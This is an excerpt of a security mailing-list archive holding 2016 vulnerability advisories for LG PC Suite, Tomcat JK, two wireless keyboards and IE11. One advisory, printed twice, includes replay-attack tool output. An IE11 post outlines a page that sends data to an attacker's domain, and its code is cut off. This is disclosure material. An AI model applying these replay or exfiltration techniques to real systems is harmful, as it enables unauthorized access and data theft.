[FD] BFS-SA-2016-004: LG PC Suite Insecure Update Mechanism

2016-10-11 Thread Blue Frost Security Research Lab

___

Vendor: LG, www.lg.com
Affected Products:  LG PC Suite for Windows
Affected Version:   <= 5.3.25.20150529 (Build 18212)
Severity:   High
OVE ID: OVE-20161010-0007


The LG PC Suite update mechanism is vulnerable to a man-in-the-middle
attack. Through the manipulation of files transmitted over HTTP an
attacker can force the execution of arbitrary code on the target system.
Code is executed with the privileges of the currently logged on user.

LG will not provide software updates to address the issue because the
LG PC Suite reached the end of its product life cycle. The technical
details as well as a possible mitigation is described in the full
advisory at:

https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-004/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [SECURITY] CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow

2016-10-11 Thread Mark Thomas

CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.41

Description
The IIS/ISAPI specific code implements special handling when a virtual
host is present. The virtual host name and the URI are concatenated to
create a virtual host mapping rule. The length checks prior to writing
to the target buffer for this rule did not take account of the length of
the virtual host name, creating the potential for a buffer overflow.
It is not known if this overflow is exploitable.

Mitigation
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat JK ISAPI Connector 1.2.42
- Where available, use IIS configuration to restrict the maximum URI
  length to 4095 - (the length of the longest virtual host name)

Credit:
This issue was discovered by The Apache Tomcat Security Team.


References:
[1] http://tomcat.apache.org/security-jk.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg

Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay
attacks with certain restrictions.



Vulnerability Details:

The SySS GmbH found out that the Microsoft Wireless Desktop 2000
keyboard is prone to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data causing the same effect as
the original data communication.

According to test results of the SySS GmbH, the Microsoft Wireless
Desktop 2000 keyboard and its USB dongle have implemented a replay
protection based on an incrementing packet counter. But the used
window for valid packet counter values is large enough to perform
a replay attack if there were not too many data packets caused by
further keystrokes between the attacker's recording and the playback.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack
scenario, an attacker records the radio communication during a
password-based user authentication of his or her victim, for instance
during a login to the operating system or during unlocking a screen
lock. At an opportune moment when the victim's computer system is
unattended, the attacker approaches the victim's computer and replays
the previously recorded AES-encrypted data communication for the
password-based user authentication and by this gets unauthorized access
to the victim's system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using the USB radio dongle Crazyradio PA (see
[2]) and a simple proof-of-concept software tool.

The following output exemplarily illustrates a replay attack with the
recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press  to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press  to replay the recorded data packets or  to
quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data:

[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg

Advisory ID: SYSS-2016-068
Product: Wireless Keyboard Set LX901
Manufacturer: Fujitsu
Affected Version(s): Model No. GK900
Tested Version(s): Model No. GK900
Vulnerability Type: Cryptographic Issues (CWE-310)
Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-07
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting
of a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"The Wireless Keyboard LX901 is a top of the line desktop solution
for lifestyle orientated customers, who want only the best for their
desk. This superb keyboard set offers ambitious users more functions,
security and better features than a conventional interface device. It
even includes 2.4 GHz technology and 128 AES encryption for security."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard LX901 is vulnerable to replay attacks.



Vulnerability Details:

The SySS GmbH found out that the wireless keyboard Fujitsu LX901 is
prone to replay attacks.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data at will causing the same
effect as the original data communication.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker
records the radio communication during a password-based user
authentication of his or her victim, for instance during a login to the
operating system or during unlocking a screen lock. At an opportune
moment when the victim's computer system is unattended, the attacker
approaches the victim's computer and replays the previously recorded
AES-encrypted data communication for the password-based user
authentication and thereby gets unauthorized access to the victim's
system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using a software-defined radio in combination
with the software tool GNU Radio Companion.



Solution:

According to information from the manufacturer Fujitsu, the reported
security issue will currently not be fixed in affected products.

The written statement in German from Fujitsu regarding this security
issue is as follows:

"Vielen Dank für Ihre Informationen zu unserer Funktastatur. Wie Ihnen
bereits mitgeteilt, halten wir das von Ihnen beschriebene
Angriffsszenario bei unserer Tastatur aufgrund des verwendeten
Funkprotokolls unter realen Bedingungen für nicht so einfach
durchführbar. Wie erwähnt, verkaufen wir mit unserer Tastatur keine
Sicherheitslösung, sondern eine Komfortlösung (ohne gravierende
Sicherheitsnachteile wie bei unverschlüsselten Wireless-Tastaturen).
In einem bereits geplanten Nachfolgeprodukt werden alle neuen
Erkenntnisse zur sicheren Datenübertragung bei Funktastaturen
einfließen."

The English translation of this statement is as follows:

"Thank you very much for your information about our wireless keyboard.
As we have already pointed out, we believe that the described scenario
is not easy to perform under real conditions due to the radio protocol
used. As mentioned, our product is not destined to sell security, but
convenience in the first place (without the security drawbacks of
unencrypted wireless keyboards). Any new information and insights will
be incorporated into the already planned successor product."



Disclosure Timeline:

2016-07-07: Vulnerability reported to manufacturer
2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory
2016-08-02: E-mail from manufacturer requesting further information
2016-08-04: Provided further information to manufacturer via e-mail
2016-08-05: E-mail from manufacturer with further questions
2016-08-08: E-mail to manufacturer with answers to open questions
2016-08-12: E-mail from manufacturer with statement regarding the
reported security issue
2016-10-05: Public release of the security advisory



References:

[1] Product website for Fujitsu Wireless Keyboard Set

http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/wl-keyboard-lx901.html
[2] SySS

[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay
attacks with certain restrictions.



Vulnerability Details:

The SySS GmbH found out that the Microsoft Wireless Desktop 2000
keyboard is prone to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data causing the same effect as
the original data communication.

According to test results of the SySS GmbH, the Microsoft Wireless
Desktop 2000 keyboard and its USB dongle have implemented a replay
protection based on an incrementing packet counter. But the used
window for valid packet counter values is large enough to perform
a replay attack if there were not too many data packets caused by
further keystrokes between the attacker's recording and the playback.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack
scenario, an attacker records the radio communication during a
password-based user authentication of his or her victim, for instance
during a login to the operating system or during unlocking a screen
lock. At an opportune moment when the victim's computer system is
unattended, the attacker approaches the victim's computer and replays
the previously recorded AES-encrypted data communication for the
password-based user authentication and by this gets unauthorized access
to the victim's system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using the USB radio dongle Crazyradio PA (see
[2]) and a simple proof-of-concept software tool.

The following output exemplarily illustrates a replay attack with the
recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press  to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press  to replay the recorded data packets or  to
quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data:

[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2016-10-11 Thread Matthias Deeg

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-033
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-04-22
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to the insufficient protection of the flash memory of the keyboard
and of the USB dongle, an attacker with physical access has read and
write access to the firmware and the used cryptographic key.



Vulnerability Details:

The SySS GmbH found out that the embedded flash memory of the wireless
keyboard Microsoft Wireless Desktop 2000  and of the corresponding USB
dongle can be read and written via the SPI interface of the used
transceivers with an embedded microcontroller nRF24LE1H (keyboard) and
nRF24LU1+ (USB dongle) as the flash memory is not protected by the
offered read back protection feature (RDISMB - Read DISable Main Block).

Thus, an attacker with physical access to the keyboard or the USB
dongle can simply read and write the SPI-addressable code and data
flash memory. Due to the use of nRF24 transceiver versions with one-time
programmable memory, write access is limited in such a way that a set
1 bit can be changed to a 0 bit but not vice versa.

The AES cryptographic key used by the Microsoft Wireless Desktop 2000
keyboard and the corresponding USB dongle is for both devices accessible
via the SPI interface.

By having read and write access to the code and data flash memory, an
attacker can either extract the cryptographic key, for instance to
perform further attacks against the wireless communication, or modify
the firmware or the cryptographic key in a limited way due to the
used one-time programmable memory.



Proof of Concept (PoC):

The SySS GmbH could successfully read the contents of the code and data
flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the
USB dongle using the hardware tool Bus Pirate [3] in combination with
the software tool nrfprog [4].



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-04-22: Vulnerability reported to manufacturer
2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory
2016-06-06: E-mail to manufacturer according current status
2016-06-27: Another e-mail to manufacturer according current status
2016-06-27: E-mail from manufacturer requesting further information
2016-06-28: Provided further information and PoC software tool
2016-07-07: E-mail from manufacturer with further information and
question about intended disclosure
2016-07-08: E-mail to manufacturer concerning the planned responsible
disclosure
2016-08-04: E-mail from manufacturer concerning limitations of actual
attacks
2016-10-05: Public release of the security advisory



References:

[1] Product website for Microsoft Wireless Desktop 2000

https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1
[2] Website of Bus Pirate hardware tool
http://dangerousprototypes.com/docs/Bus_Pirate
[3] nrfprog Github repository
https://github.com/nekromant/nrfprog
[4] SySS Security Advisory SYSS-2016-033

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier and
Matthias Deeg of the SySS GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7

E-Mail:

Re: [FD] IE11 is not following CORS specification for local files

2016-10-11 Thread Ricardo Iramar dos Santos

I did a small improvement in this attack.
Using IE File API
(https://msdn.microsoft.com/en-us/library/hh772315(v=vs.85).aspx) an
attacker would be able to create a web page with the content below and
send to a victim.
A local file with the same content that I sent previously would be
created on download default folder.
If the victim perform the three following clicks (Save, Open and Allow
blocked content) an attacker would be able to perform any request to
any domain and send the content to a domain which he/she has control.
If the attacker is a MitM position this could be more intersting.
Since the attacker could inject this content in a HTTP page and the
victim will tend to relay on that.
Next step would be force the victim to click on Save, Open and Allow
blocked content buttons.



Saving Files Locally

  if (typeof Blob !== "undefined") {
demoBlobs();
  }
  function demoBlobs(){
var blob = new Blob(["